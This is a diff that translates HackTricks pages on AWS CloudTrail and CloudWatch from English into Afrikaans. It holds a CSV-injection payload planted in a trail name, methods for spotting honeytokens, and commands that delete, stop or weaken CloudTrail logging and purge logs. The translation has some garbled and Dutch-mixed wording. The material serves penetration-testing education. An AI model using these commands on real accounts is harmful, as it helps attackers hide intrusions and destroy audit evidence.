+Wanneer 'n CloudTrail geskep word, is dit moontlik om aan te dui om cloudtrail te aktiveer vir al die rekeninge in die org en om die logs in net 1 bucket te kry:
 
 <figure><img src="../../../../images/image (200).png" alt=""><figcaption></figcaption></figure>
 
-This way you can easily configure CloudTrail in all the regions of all the accounts and centralize the logs in 1 account (that you should protect).
+Op hierdie manier kan jy CloudTrail maklik in al die streke van al die rekeninge konfigureer en die logs in 1 rekening sentraliseer (wat jy moet beskerm).
 
-### Log Files Checking
-
-You can check that the logs haven't been altered by running
+### Log Lêers Kontrole
 
+Jy kan kontroleer dat die logs nie verander is nie deur te loop
 ```javascript
 aws cloudtrail validate-logs --trail-arn <trailARN> --start-time <start-time> [--end-time <end-time>] [--s3-bucket <bucket-name>] [--s3-prefix <prefix>] [--verbose]
 ```
-
 ### Logs to CloudWatch
 
-**CloudTrail can automatically send logs to CloudWatch so you can set alerts that warns you when suspicious activities are performed.**\
-Note that in order to allow CloudTrail to send the logs to CloudWatch a **role** needs to be created that allows that action. If possible, it's recommended to use AWS default role to perform these actions. This role will allow CloudTrail to:
+**CloudTrail kan outomaties logs na CloudWatch stuur sodat jy waarskuwings kan stel wat jou waarsku wanneer verdagte aktiwiteite uitgevoer word.**\
+Let daarop dat om CloudTrail toe te laat om die logs na CloudWatch te stuur, 'n **rol** geskep moet word wat daardie aksie toelaat. Indien moontlik, word dit aanbeveel om die AWS standaardrol te gebruik om hierdie aksies uit te voer. Hierdie rol sal CloudTrail toelaat om:
 
-- CreateLogStream: This allows to create a CloudWatch Logs log streams
-- PutLogEvents: Deliver CloudTrail logs to CloudWatch Logs log stream
+- CreateLogStream: Dit laat jou toe om 'n CloudWatch Logs logstroom te skep
+- PutLogEvents: Lewer CloudTrail logs aan die CloudWatch Logs logstroom
 
 ### Event History
 
-CloudTrail Event History allows you to inspect in a table the logs that have been recorded:
+CloudTrail Event History laat jou toe om in 'n tabel die logs wat opgeteken is, te inspekteer:
 
 ![](<../../../../images/image (89).png>)
 
 ### Insights
 
-**CloudTrail Insights** automatically **analyzes** write management events from CloudTrail trails and **alerts** you to **unusual activity**. For example, if there is an increase in `TerminateInstance` events that differs from established baselines, you’ll see it as an Insight event. These events make **finding and responding to unusual API activity easier** than ever.
+**CloudTrail Insights** analiseer outomaties **skrywe bestuur gebeurtenisse** van CloudTrail spore en **waarsku** jou oor **ongewone aktiwiteit**. Byvoorbeeld, as daar 'n toename in `TerminateInstance` gebeurtenisse is wat verskil van gevestigde baselines, sal jy dit as 'n Insight gebeurtenis sien. Hierdie gebeurtenisse maak **dit makliker om ongewone API aktiwiteit te vind en daarop te reageer** as ooit tevore.
 
-The insights are stored in the same bucket as the CloudTrail logs in: `BucketName/AWSLogs/AccountID/CloudTrail-Insight`
+Die insigte word in dieselfde emmer as die CloudTrail logs gestoor in: `BucketName/AWSLogs/AccountID/CloudTrail-Insight`
 
 ### Security
 
-| CloudTrail Log File Integrity        | <ul><li>Validate if logs have been tampered with (modified or deleted)</li><li><p>Uses digest files (create hash for each file)</p><ul><li>SHA-256 hashing</li><li>SHA-256 with RSA for digital signing</li><li>private key owned by Amazon</li></ul></li><li>Takes 1 hour to create a digest file (done on the hour every hour)</li></ul> |
+| CloudTrail Log File Integrity        | <ul><li>Verifieer of logs gemanipuleer is (gewysig of verwyder)</li><li><p>Gebruik digest lêers (skep hash vir elke lêer)</p><ul><li>SHA-256 hashing</li><li>SHA-256 met RSA vir digitale ondertekening</li><li>privaat sleutel besit deur Amazon</li></ul></li><li>Neem 1 uur om 'n digest lêer te skep (gedoen op die uur elke uur)</li></ul> |
 | ------------------------------------ | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ |
-| Stop unauthorized access             | <ul><li><p>Use IAM policies and S3 bucket policies</p><ul><li>security team —> admin access</li><li>auditors —> read only access</li></ul></li><li>Use SSE-S3/SSE-KMS to encrypt the logs</li></ul>                                                                                                                                        |
-| Prevent log files from being deleted | <ul><li>Restrict delete access with IAM and bucket policies</li><li>Configure S3 MFA delete</li><li>Validate with Log File Validation</li></ul>                                                                                                                                                                                            |
+| Stop unauthorized access             | <ul><li><p>Gebruik IAM beleid en S3 emmer beleid</p><ul><li>sekuriteitspan —> admin toegang</li><li>ouditeurs —> lees slegs toegang</li></ul></li><li>Gebruik SSE-S3/SSE-KMS om die logs te enkripteer</li></ul>                                                                                                                                        |
+| Prevent log files from being deleted | <ul><li>Beperk verwyder toegang met IAM en emmer beleid</li><li>Konfigureer S3 MFA verwydering</li><li>Verifieer met Log File Validation</li></ul>                                                                                                                                                                                            |
 
 ## Access Advisor
 
-AWS Access Advisor relies on last 400 days AWS **CloudTrail logs to gather its insights**. CloudTrail captures a history of AWS API calls and related events made in an AWS account. Access Advisor utilizes this data to **show when services were last accessed**. By analyzing CloudTrail logs, Access Advisor can determine which AWS services an IAM user or role has accessed and when that access occurred. This helps AWS administrators make informed decisions about **refining permissions**, as they can identify services that haven't been accessed for extended periods and potentially reduce overly broad permissions based on real usage patterns.
+AWS Access Advisor staat op die laaste 400 dae AWS **CloudTrail logs om sy insigte te versamel**. CloudTrail vang 'n geskiedenis van AWS API oproepe en verwante gebeurtenisse wat in 'n AWS rekening gemaak is. Access Advisor gebruik hierdie data om **te wys wanneer dienste laas toeganklik was**. Deur CloudTrail logs te analiseer, kan Access Advisor bepaal watter AWS dienste 'n IAM gebruiker of rol toeganklik gemaak het en wanneer daardie toegang plaasgevind het. Dit help AWS administrateurs om ingeligte besluite te neem oor **die verfyning van toestemmings**, aangesien hulle dienste kan identifiseer wat vir lang tydperke nie toeganklik was nie en moontlik oorbodige breë toestemmings kan verminder op grond van werklike gebruikspatrone.
 
 > [!TIP]
-> Therefore, Access Advisor informs about **the unnecessary permissions being given to users** so the admin could remove them
+> Daarom informeer Access Advisor oor **die onnodige toestemmings wat aan gebruikers gegee word** sodat die admin dit kan verwyder
 
 <figure><img src="../../../../images/image (78).png" alt=""><figcaption></figcaption></figure>
 
 ## Actions
 
 ### Enumeration
-
 ```bash
 # Get trails info
 aws cloudtrail list-trails
@@ -125,125 +122,113 @@ aws cloudtrail list-event-data-stores
 aws cloudtrail list-queries --event-data-store <data-source>
 aws cloudtrail get-query-results --event-data-store <data-source> --query-id <id>
 ```
-
 ### **CSV Injection**
 
-It's possible to perform a CVS injection inside CloudTrail that will execute arbitrary code if the logs are exported in CSV and open with Excel.\
-The following code will generate log entry with a bad Trail name containing the payload:
-
+Dit is moontlik om 'n CVS-inspuiting binne CloudTrail uit te voer wat arbitrêre kode sal uitvoer as die logs in CSV geëksporteer en met Excel oopgemaak word.\
+Die volgende kode sal 'n loginskrywing genereer met 'n slegte Trail-naam wat die payload bevat:
 ```python
 import boto3
 payload = "=cmd|'/C calc'|''"
 client = boto3.client('cloudtrail')
 response = client.create_trail(
-	Name=payload,
-	S3BucketName="random"
+Name=payload,
+S3BucketName="random"
 )
 print(response)
 ```
-
-For more information about CSV Injections check the page:
+Vir meer inligting oor CSV-inspuitings, kyk na die bladsy:
 
 {{#ref}}
 https://book.hacktricks.xyz/pentesting-web/formula-injection
 {{#endref}}
 
-For more information about this specific technique check [https://rhinosecuritylabs.com/aws/cloud-security-csv-injection-aws-cloudtrail/](https://rhinosecuritylabs.com/aws/cloud-security-csv-injection-aws-cloudtrail/)
+Vir meer inligting oor hierdie spesifieke tegniek, kyk [https://rhinosecuritylabs.com/aws/cloud-security-csv-injection-aws-cloudtrail/](https://rhinosecuritylabs.com/aws/cloud-security-csv-injection-aws-cloudtrail/)
 
-## **Bypass Detection**
+## **Om Detection te omseil**
 
-### HoneyTokens **bypass**
+### HoneyTokens **omseil**
 
-Honeyokens are created to **detect exfiltration of sensitive information**. In case of AWS, they are **AWS keys whose use is monitored**, if something triggers an action with that key, then someone must have stolen that key.
+Honeytokens word geskep om **die uitvloeiing van sensitiewe inligting te ontdek**. In die geval van AWS, is dit **AWS sleutels waarvan die gebruik gemonitor word**, as iets 'n aksie met daardie sleutel aktiveer, dan moet iemand daardie sleutel gesteel het.
 
-However, Honeytokens like the ones created by [**Canarytokens**](https://canarytokens.org/generate)**,** [**SpaceCrab**](https://bitbucket.org/asecurityteam/spacecrab/issues?status=new&status=open)**,** [**SpaceSiren**](https://github.com/spacesiren/spacesiren) are either using recognizable account name or using the same AWS account ID for all their customers. Therefore, if you can get the account name and/or account ID without making Cloudtrail create any log, **you could know if the key is a honeytoken or not**.
+E however, Honeytokens soos die wat geskep is deur [**Canarytokens**](https://canarytokens.org/generate)**,** [**SpaceCrab**](https://bitbucket.org/asecurityteam/spacecrab/issues?status=new&status=open)**,** [**SpaceSiren**](https://github.com/spacesiren/spacesiren) gebruik óf 'n herkenbare rekeningnaam óf gebruik dieselfde AWS rekening ID vir al hul kliënte. Daarom, as jy die rekeningnaam en/of rekening ID kan kry sonder om Cloudtrail enige log te laat skep, **kan jy weet of die sleutel 'n honeytoken is of nie**.
 
-[**Pacu**](https://github.com/RhinoSecurityLabs/pacu/blob/79cd7d58f7bff5693c6ae73b30a8455df6136cca/pacu/modules/iam__detect_honeytokens/main.py#L57) has some rules to detect if a key belongs to [**Canarytokens**](https://canarytokens.org/generate)**,** [**SpaceCrab**](https://bitbucket.org/asecurityteam/spacecrab/issues?status=new&status=open)**,** [**SpaceSiren**](https://github.com/spacesiren/spacesiren)**:**
+[**Pacu**](https://github.com/RhinoSecurityLabs/pacu/blob/79cd7d58f7bff5693c6ae73b30a8455df6136cca/pacu/modules/iam__detect_honeytokens/main.py#L57) het 'n paar reëls om te detecteer of 'n sleutel aan [**Canarytokens**](https://canarytokens.org/generate)**,** [**SpaceCrab**](https://bitbucket.org/asecurityteam/spacecrab/issues?status=new&status=open)**,** [**SpaceSiren**](https://github.com/spacesiren/spacesiren)** behoort:**
 
-- If **`canarytokens.org`** appears in the role name or the account ID **`534261010715`** appears in the error message.
-  - Testing them more recently, they are using the account **`717712589309`** and still has the **`canarytokens.com`** string in the name.
-- If **`SpaceCrab`** appears in the role name in the error message
-- **SpaceSiren** uses **uuids** to generate usernames: `[a-f0-9]{8}-[a-f0-9]{4}-4[a-f0-9]{3}-[89aAbB][a-f0-9]{3}-[a-f0-9]{12}`
-- If the **name looks like randomly generated**, there are high probabilities that it's a HoneyToken.
+- As **`canarytokens.org`** in die rolnaam verskyn of die rekening ID **`534261010715`** in die foutboodskap verskyn.
+- Deur hulle meer onlangs te toets, gebruik hulle die rekening **`717712589309`** en het steeds die **`canarytokens.com`** string in die naam.
+- As **`SpaceCrab`** in die rolnaam in die foutboodskap verskyn.
+- **SpaceSiren** gebruik **uuids** om gebruikersname te genereer: `[a-f0-9]{8}-[a-f0-9]{4}-4[a-f0-9]{3}-[89aAbB][a-f0-9]{3}-[a-f0-9]{12}`
+- As die **naam lyk soos lukraak gegenereer**, is daar 'n hoë waarskynlikheid dat dit 'n HoneyToken is.
 
-#### Get the account ID from the Key ID
-
-You can get the **Account ID** from the **encoded** inside the **access key** as [**explained here**](https://medium.com/@TalBeerySec/a-short-note-on-aws-key-id-f88cc4317489) and check the account ID with your list of Honeytokens AWS accounts:
+#### Kry die rekening ID van die Sleutel ID
 
+Jy kan die **Rekening ID** kry van die **gecodeerde** binne die **toegangssleutel** soos [**hier verduidelik**](https://medium.com/@TalBeerySec/a-short-note-on-aws-key-id-f88cc4317489) en die rekening ID met jou lys van Honeytokens AWS rekeninge nagaan:
 ```python
 import base64
 import binascii
 
 def AWSAccount_from_AWSKeyID(AWSKeyID):
 
-    trimmed_AWSKeyID = AWSKeyID[4:] #remove KeyID prefix
-    x = base64.b32decode(trimmed_AWSKeyID) #base32 decode
-    y = x[0:6]
+trimmed_AWSKeyID = AWSKeyID[4:] #remove KeyID prefix
+x = base64.b32decode(trimmed_AWSKeyID) #base32 decode
+y = x[0:6]
 
-    z = int.from_bytes(y, byteorder='big', signed=False)
-    mask = int.from_bytes(binascii.unhexlify(b'7fffffffff80'), byteorder='big', signed=False)
+z = int.from_bytes(y, byteorder='big', signed=False)
+mask = int.from_bytes(binascii.unhexlify(b'7fffffffff80'), byteorder='big', signed=False)
 
-    e = (z & mask)>>7
-    return (e)
+e = (z & mask)>>7
+return (e)
 
 print("account id:" + "{:012d}".format(AWSAccount_from_AWSKeyID("ASIAQNZGKIQY56JQ7WML")))
 ```
-
 Check more information in the [**orginal research**](https://medium.com/@TalBeerySec/a-short-note-on-aws-key-id-f88cc4317489).
 
-#### Do not generate a log
+#### Moet nie 'n log genereer nie
 
-The most effective technique for this is actually a simple one. Just use the key you just found to access some service inside your own attackers account. This will make **CloudTrail generate a log inside YOUR OWN AWS account and not inside the victims**.
+Die mees effektiewe tegniek hiervoor is eintlik 'n eenvoudige een. Gebruik net die sleutel wat jy net gevind het om toegang te verkry tot 'n diens binne jou eie aanvallersrekening. Dit sal **CloudTrail 'n log binne JOU EIE AWS-rekening genereer en nie binne die slagoffers nie**.
 
-The things is that the output will show you an error indicating the account ID and the account name so **you will be able to see if it's a Honeytoken**.
+Die ding is dat die uitvoer jou 'n fout sal wys wat die rekening ID en die rekening naam aandui, sodat **jy sal kan sien of dit 'n Honeytoken is**.
 
-#### AWS services without logs
+#### AWS-dienste sonder logs
 
-In the past there were some **AWS services that doesn't send logs to CloudTrail** (find a [list here](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-unsupported-aws-services.html)). Some of those services will **respond** with an **error** containing the **ARN of the key role** if someone unauthorised (the honeytoken key) try to access it.
+In die verlede was daar 'n paar **AWS-dienste wat nie logs na CloudTrail stuur nie** (vind 'n [lys hier](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-unsupported-aws-services.html)). Sommige van daardie dienste sal **reageer** met 'n **fout** wat die **ARN van die sleutelrol** bevat as iemand ongeoorloof (die honeytoken sleutel) probeer om toegang te verkry.
 
-This way, an **attacker can obtain the ARN of the key without triggering any log**. In the ARN the attacker can see the **AWS account ID and the name**, it's easy to know the HoneyToken's companies accounts ID and names, so this way an attacker can identify id the token is a HoneyToken.
+Op hierdie manier kan 'n **aanvaller die ARN van die sleutel verkry sonder om enige log te aktiveer**. In die ARN kan die aanvaller die **AWS rekening ID en die naam** sien, dit is maklik om die HoneyToken se maatskappy rekening ID en name te ken, so op hierdie manier kan 'n aanvaller identifiseer of die token 'n HoneyToken is.
 
 ![](<../../../../images/image (93).png>)
 
 > [!CAUTION]
-> Note that all public APIs discovered to not being creating CloudTrail logs are now fixed, so maybe you need to find your own...
+> Let daarop dat alle openbare API's wat ontdek is dat hulle nie CloudTrail logs genereer nie, nou reggestel is, so dalk moet jy jou eie vind...
 >
-> For more information check the [**original research**](https://rhinosecuritylabs.com/aws/aws-iam-enumeration-2-0-bypassing-cloudtrail-logging/).
+> Vir meer inligting, kyk na die [**original research**](https://rhinosecuritylabs.com/aws/aws-iam-enumeration-2-0-bypassing-cloudtrail-logging/).
 
-### Accessing Third Infrastructure
+### Toegang tot Derde Infrastruktuur
 
-Certain AWS services will **spawn some infrastructure** such as **Databases** or **Kubernetes** clusters (EKS). A user **talking directly to those services** (like the Kubernetes API) **won’t use the AWS API**, so CloudTrail won’t be able to see this communication.
+Sekere AWS-dienste sal **'n bietjie infrastruktuur** genereer soos **Databases** of **Kubernetes** klusters (EKS). 'n Gebruiker wat **direk met daardie dienste praat** (soos die Kubernetes API) **sal nie die AWS API gebruik nie**, so CloudTrail sal nie in staat wees om hierdie kommunikasie te sien nie.
 
-Therefore, a user with access to EKS that has discovered the URL of the EKS API could generate a token locally and **talk to the API service directly without getting detected by Cloudtrail**.
+Daarom kan 'n gebruiker met toegang tot EKS wat die URL van die EKS API ontdek het, 'n token plaaslik genereer en **direk met die API-diens praat sonder om deur Cloudtrail opgespoor te word**.
 
-More info in:
+Meer info in:
 
 {{#ref}}
 ../../aws-post-exploitation/aws-eks-post-exploitation.md
 {{#endref}}
 
-### Modifying CloudTrail Config
-
-#### Delete trails
+### Wysig CloudTrail Konfigurasie
 
+#### Verwyder spore
 ```bash
 aws cloudtrail delete-trail --name [trail-name]
 ```
-
-#### Stop trails
-
+#### Stop spore
 ```bash
 aws cloudtrail stop-logging --name [trail-name]
 ```
-
-#### Disable multi-region logging
-
+#### Deaktiveer multi-region logging
 ```bash
 aws cloudtrail update-trail --name [trail-name] --no-is-multi-region --no-include-global-services
 ```
-
-#### Disable Logging by Event Selectors
-
+#### Deaktiveer Logging deur Gebeurtenis Keuses
 ```bash
 # Leave only the ReadOnly selector
 aws cloudtrail put-event-selectors --trail-name <trail_name> --event-selectors '[{"ReadWriteType": "ReadOnly"}]' --region <region>
@@ -251,30 +236,27 @@ aws cloudtrail put-event-selectors --trail-name <trail_name> --event-selectors '
 # Remove all selectors (stop Insights)
 aws cloudtrail put-event-selectors --trail-name <trail_name> --event-selectors '[]' --region <region>
 ```
+In die eerste voorbeeld word 'n enkele gebeurtenis selektor as 'n JSON-array met 'n enkele objek voorsien. Die `"ReadWriteType": "ReadOnly"` dui aan dat die **gebeurtenis selektor slegs lees-slegs gebeurtenisse moet vasvang** (so CloudTrail insigte **sal nie skryf** gebeurtenisse nagaan nie).
 
-In the first example, a single event selector is provided as a JSON array with a single object. The `"ReadWriteType": "ReadOnly"` indicates that the **event selector should only capture read-only events** (so CloudTrail insights **won't be checking write** events for example).
-
-You can customize the event selector based on your specific requirements.
-
-#### Logs deletion via S3 lifecycle policy
+Jy kan die gebeurtenis selektor aanpas op grond van jou spesifieke vereistes.
 
+#### Logs verwydering via S3 lewensiklusbeleid
 ```bash
 aws s3api put-bucket-lifecycle --bucket <bucket_name> --lifecycle-configuration '{"Rules": [{"Status": "Enabled", "Prefix": "", "Expiration": {"Days": 7}}]}' --region <region>
 ```
-
 ### Modifying Bucket Configuration
 
-- Delete the S3 bucket
-- Change bucket policy to deny any writes from the CloudTrail service
-- Add lifecycle policy to S3 bucket to delete objects
-- Disable the kms key used to encrypt the CloudTrail logs
+- Verwyder die S3-bucket
+- Verander die bucket-beleid om enige skrywe van die CloudTrail-diens te weier
+- Voeg 'n lewensiklusbeleid by die S3-bucket om voorwerpe te verwyder
+- Deaktiveer die kms-sleutel wat gebruik word om die CloudTrail-logboek te enkripteer
 
 ### Cloudtrail ransomware
 
 #### S3 ransomware
 
-You could **generate an asymmetric key** and make **CloudTrail encrypt the data** with that key and **delete the private key** so the CloudTrail contents cannot be recovered cannot be recovered.\
-This is basically a **S3-KMS ransomware** explained in:
+Jy kan **'n asymmetriese sleutel genereer** en **CloudTrail die data met daardie sleutel enkripteer** en **die private sleutel verwyder** sodat die CloudTrail-inhoud nie herstel kan word nie.\
+Dit is basies **S3-KMS ransomware** wat verduidelik word in:
 
 {{#ref}}
 ../../aws-post-exploitation/aws-s3-post-exploitation.md
@@ -282,7 +264,7 @@ This is basically a **S3-KMS ransomware** explained in:
 
 **KMS ransomware**
 
-This is an easiest way to perform the previous attack with different permissions requirements:
+Dit is 'n maklike manier om die vorige aanval met verskillende toestemmingsvereistes uit te voer:
 
 {{#ref}}
 ../../aws-post-exploitation/aws-kms-post-exploitation.md
@@ -293,7 +275,3 @@ This is an easiest way to perform the previous attack with different permissions
 - [https://cloudsecdocs.com/aws/services/logging/cloudtrail/#inventory](https://cloudsecdocs.com/aws/services/logging/cloudtrail/#inventory)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md
index 0c790b881..1cf6d2e2c 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md
@@ -4,143 +4,142 @@
 
 ## CloudWatch
 
-**CloudWatch** **collects** monitoring and operational **data** in the form of logs/metrics/events providing a **unified view of AWS resources**, applications and services.\
-CloudWatch Log Event have a **size limitation of 256KB on each log line**.\
-It can set **high resolution alarms**, visualize **logs** and **metrics** side by side, take automated actions, troubleshoot issues, and discover insights to optimize applications.
+**CloudWatch** **verskaf** monitering en operasionele **data** in die vorm van logs/metrieke/gebeurtenisse wat 'n **geïntegreerde oorsig van AWS hulpbronne**, toepassings en dienste bied.\
+CloudWatch Log Gebeurtenis het 'n **grootte beperking van 256KB op elke loglyn**.\
+Dit kan **hoë resolusie alarms** stel, **logs** en **metrieke** langs mekaar visualiseer, outomatiese aksies neem, probleme oplos, en insigte ontdek om toepassings te optimaliseer.
 
-You can monitor for example logs from CloudTrail. Events that are monitored:
+Jy kan byvoorbeeld logs van CloudTrail monitor. Gebeurtenisse wat gemonitor word:
 
-- Changes to Security Groups and NACLs
-- Starting, Stopping, rebooting and terminating EC2 instances
-- Changes to Security Policies within IAM and S3
-- Failed login attempts to the AWS Management Console
-- API calls that resulted in failed authorization
-- Filters to search in cloudwatch: [https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/FilterAndPatternSyntax.html](https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/FilterAndPatternSyntax.html)
+- Veranderinge aan Sekuriteitsgroepe en NACLs
+- Begin, Stop, herbegin en beëindig EC2 instansies
+- Veranderinge aan Sekuriteitsbeleide binne IAM en S3
+- Mislukte aanmeldpogings tot die AWS Bestuurskonsol
+- API-oproepe wat gelei het tot mislukte outorisasie
+- Filters om in cloudwatch te soek: [https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/FilterAndPatternSyntax.html](https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/FilterAndPatternSyntax.html)
 
-## Key concepts
+## Sleutelkonsepte
 
 ### Namespaces
 
-A namespace is a container for CloudWatch metrics. It helps to categorize and isolate metrics, making it easier to manage and analyze them.
+'n Namespace is 'n houer vir CloudWatch metrieke. Dit help om metrieke te kategoriseer en te isoleer, wat dit makliker maak om dit te bestuur en te analiseer.
 
-- **Examples**: AWS/EC2 for EC2-related metrics, AWS/RDS for RDS metrics.
+- **Voorbeelde**: AWS/EC2 vir EC2-verwante metrieke, AWS/RDS vir RDS metrieke.
 
-### Metrics
+### Metrieke
 
-Metrics are data points collected over time that represent the performance or utilization of AWS resources. Metrics can be collected from AWS services, custom applications, or third-party integrations.
+Metrieke is datapunten wat oor tyd versamel word en die prestasie of benutting van AWS hulpbronne verteenwoordig. Metrieke kan van AWS dienste, pasgemaakte toepassings, of derdeparty integrasies versamel word.
 
-- **Example**: CPUUtilization, NetworkIn, DiskReadOps.
+- **Voorbeeld**: CPUUtilization, NetworkIn, DiskReadOps.
 
-### Dimensions
+### Dimensies
 
-Dimensions are key-value pairs that are part of metrics. They help to uniquely identify a metric and provide additional context, being 30 the most number of dimensions that can be associated with a metric. Dimensions also allow to filter and aggregate metrics based on specific attributes.
+Dimensies is sleutel-waarde pare wat deel is van metrieke. Dit help om 'n metriek uniek te identifiseer en bied addisionele konteks, met 30 die maksimum aantal dimensies wat aan 'n metriek gekoppel kan word. Dimensies laat ook toe om metrieke te filter en te aggregeer op grond van spesifieke eienskappe.
 
-- **Example**: For EC2 instances, dimensions might include InstanceId, InstanceType, and AvailabilityZone.
+- **Voorbeeld**: Vir EC2 instansies kan dimensies InstanceId, InstanceType, en AvailabilityZone insluit.
 
-### Statistics
+### Statistieke
 
-Statistics are mathematical calculations performed on metric data to summarize it over time. Common statistics include Average, Sum, Minimum, Maximum, and SampleCount.
+Statistieke is wiskundige berekeninge wat op metriekdata uitgevoer word om dit oor tyd saam te vat. Algemene statistieke sluit Gemiddelde, Som, Minimum, Maksimum, en MonsterTelling in.
 
-- **Example**: Calculating the average CPU utilization over a period of one hour.
+- **Voorbeeld**: Die gemiddelde CPU benutting oor 'n tydperk van een uur bereken.
 
-### Units
+### Eenhede
 
-Units are the measurement type associated with a metric. Units help to provide context and meaning to the metric data. Common units include Percent, Bytes, Seconds, Count.
+Eenhede is die meting tipe wat aan 'n metriek gekoppel is. Eenhede help om konteks en betekenis aan die metriekdata te bied. Algemene eenhede sluit Persent, Bytes, Sekondes, Telling in.
 
-- **Example**: CPUUtilization might be measured in Percent, while NetworkIn might be measured in Bytes.
+- **Voorbeeld**: CPUUtilization kan in Persent gemeet word, terwyl NetworkIn in Bytes gemeet kan word.
 
-## CloudWatch Features
+## CloudWatch Kenmerke
 
 ### Dashboard
 
-**CloudWatch Dashboards** provide customizable **views of your AWS CloudWatch metrics**. It is possible to create and configure dashboards to visualize data and monitor resources in a single view, combining different metrics from various AWS services.
+**CloudWatch Dashboards** bied aanpasbare **uitsigte van jou AWS CloudWatch metrieke**. Dit is moontlik om dashboards te skep en te konfigureer om data te visualiseer en hulpbronne in 'n enkele uitsig te monitor, wat verskillende metrieke van verskeie AWS dienste kombineer.
 
-**Key Features**:
+**Sleutel Kenmerke**:
 
-- **Widgets**: Building blocks of dashboards, including graphs, text, alarms, and more.
-- **Customization**: Layout and content can be customized to fit specific monitoring needs.
+- **Widgets**: Boublokke van dashboards, insluitend grafieke, teks, alarms, en meer.
+- **Aanpassing**: Uitsig en inhoud kan aangepas word om spesifieke monitering behoeftes te pas.
 
-**Example Use Case**:
+**Voorbeeld Gebruik Geval**:
 
-- A single dashboard showing key metrics for your entire AWS environment, including EC2 instances, RDS databases, and S3 buckets.
+- 'n Enkele dashboard wat sleutelmetrieke vir jou hele AWS omgewing toon, insluitend EC2 instansies, RDS databasisse, en S3 emmers.
 
-### Metric Stream and Metric Data
+### Metriek Stroom en Metriek Data
 
-**Metric Streams** in AWS CloudWatch enable you to continuously stream CloudWatch metrics to a destination of your choice in near real-time. This is particularly useful for advanced monitoring, analytics, and custom dashboards using tools outside of AWS.
+**Metriek Strome** in AWS CloudWatch stel jou in staat om CloudWatch metrieke voortdurend na 'n bestemming van jou keuse in byna regte tyd te stroom. Dit is veral nuttig vir gevorderde monitering, analise, en pasgemaakte dashboards wat gereedskap buite AWS gebruik.
 
-**Metric Data** inside Metric Streams refers to the actual measurements or data points that are being streamed. These data points represent various metrics like CPU utilization, memory usage, etc., for AWS resources.
+**Metriek Data** binne Metriek Strome verwys na die werklike metings of datapunten wat gestroom word. Hierdie datapunten verteenwoordig verskillende metrieke soos CPU benutting, geheue gebruik, ens., vir AWS hulpbronne.
 
-**Example Use Case**:
+**Voorbeeld Gebruik Geval**:
 
-- Sending real-time metrics to a third-party monitoring service for advanced analysis.
-- Archiving metrics in an Amazon S3 bucket for long-term storage and compliance.
+- Stuur regte tyd metrieke na 'n derdeparty moniteringsdiens vir gevorderde analise.
+- Argiveer metrieke in 'n Amazon S3 emmer vir langtermyn berging en nakoming.
 
 ### Alarm
 
-**CloudWatch Alarms** monitor your metrics and perform actions based on predefined thresholds. When a metric breaches a threshold, the alarm can perform one or more actions such as sending notifications via SNS, triggering an auto-scaling policy, or running an AWS Lambda function.
+**CloudWatch Alarms** monitor jou metrieke en voer aksies uit op grond van vooraf gedefinieerde drempels. Wanneer 'n metriek 'n drempel oorskry, kan die alarm een of meer aksies uitvoer soos om kennisgewings via SNS te stuur, 'n outo-skaal beleid te aktiveer, of 'n AWS Lambda funksie te laat loop.
 
-**Key Components**:
+**Sleutel Komponente**:
 
-- **Threshold**: The value at which the alarm triggers.
-- **Evaluation Periods**: The number of periods over which data is evaluated.
-- **Datapoints to Alarm**: The number of periods with a reached threshold needed to trigger the alarm
-- **Actions**: What happens when an alarm state is triggered (e.g., notify via SNS).
+- **Drempel**: Die waarde waarop die alarm geaktiveer word.
+- **Evaluasie Tydperke**: Die aantal tydperke waaroor data geëvalueer word.
+- **Datapunten om Alarm**: Die aantal tydperke met 'n bereikde drempel wat nodig is om die alarm te aktiveer.
+- **Aksies**: Wat gebeur wanneer 'n alarmtoestand geaktiveer word (bv. kennisgewing via SNS).
 
-**Example Use Case**:
+**Voorbeeld Gebruik Geval**:
 
-- Monitoring EC2 instance CPU utilization and sending a notification via SNS if it exceeds 80% for 5 consecutive minutes.
+- Monitering van EC2 instansie CPU benutting en 'n kennisgewing via SNS stuur as dit 80% vir 5 agtereenvolgende minute oorskry.
 
-### Anomaly Detectors
+### Anomalie Detektors
 
-**Anomaly Detectors** use machine learning to automatically detect anomalies in your metrics. You can apply anomaly detection to any CloudWatch metric to identify deviations from normal patterns that might indicate issues.
+**Anomalie Detektors** gebruik masjienleer om outomaties anomalieë in jou metrieke te detecteer. Jy kan anomalie detectie op enige CloudWatch metriek toepas om afwykings van normale patrone te identifiseer wat probleme kan aandui.
 
-**Key Components**:
+**Sleutel Komponente**:
 
-- **Model Training**: CloudWatch uses historical data to train a model and establish what normal behavior looks like.
-- **Anomaly Detection Band**: A visual representation of the expected range of values for a metric.
+- **Model Opleiding**: CloudWatch gebruik historiese data om 'n model op te lei en te bepaal hoe normale gedrag lyk.
+- **Anomalie Detectie Band**: 'n Visuele voorstelling van die verwagte reeks waardes vir 'n metriek.
 
-**Example Use Case**:
+**Voorbeeld Gebruik Geval**:
 
-- Detecting unusual CPU utilization patterns in an EC2 instance that might indicate a security breach or application issue.
+- Die opsporing van ongewone CPU benutting patrone in 'n EC2 instansie wat 'n sekuriteitsbreuk of toepassingsprobleem kan aandui.
 
-### Insight Rules and Managed Insight Rules
+### Inzicht Reëls en Gemanagte Inzicht Reëls
 
-**Insight Rules** allow you to identify trends, detect spikes, or other patterns of interest in your metric data using **powerful mathematical expressions** to define the conditions under which actions should be taken. These rules can help you identify anomalies or unusual behaviors in your resource performance and utilization.
